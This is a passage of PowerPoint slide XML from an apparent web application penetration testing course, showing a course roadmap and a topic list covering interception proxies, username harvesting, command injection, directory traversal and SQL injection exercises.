            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>the Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Recon &amp; Mapping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server-Side Vuln</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server-Side Vuln</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Discovery Cont.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Capture the Flag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="3670300" y="707084"/>
            <a:ext cx="1892300" cy="5846116"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1192"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 1192"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 1192"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 1192"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 1192"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 1192 w 1192"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="1192" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="2164"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1192" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1192" y="3984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2164"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="99CCFF">
              <a:alpha val="50195"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="707084"/>
            <a:ext cx="3429000" cy="5922315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="99FFCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000">
                    <a:srgbClr val="000000">
                      <a:alpha val="43000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Vulnerability Discovery Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Creating Custom Scripts for </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>     Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Python for Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Exercise: Python Scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web App Vulnerabilities and Manual</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>   Verification Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Interception Proxies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Fiddler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> OWASP Zed Attack Proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Burp Suite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Interception Exercise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Information Leakage &amp; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>    Directory Browsing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Directory Browsing Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Username Harvesting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Username Harvesting Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Command Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Command Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Directory Traversal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Blind SQL Injection</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041"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="1905000"/>
            <a:ext cx="8458200" cy="4419600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Attacker's View of </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>the Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Recon &amp; Mapping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server-Side Vuln</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server-Side Vuln</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Discovery Cont.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Capture the Flag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="3670300" y="707084"/>
            <a:ext cx="1892300" cy="5846116"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1192"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 1192"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 1192"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 1192"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 1192"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 1192 w 1192"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="1192" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="2164"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1192" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1192" y="3984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2164"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="99CCFF">
              <a:alpha val="50195"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
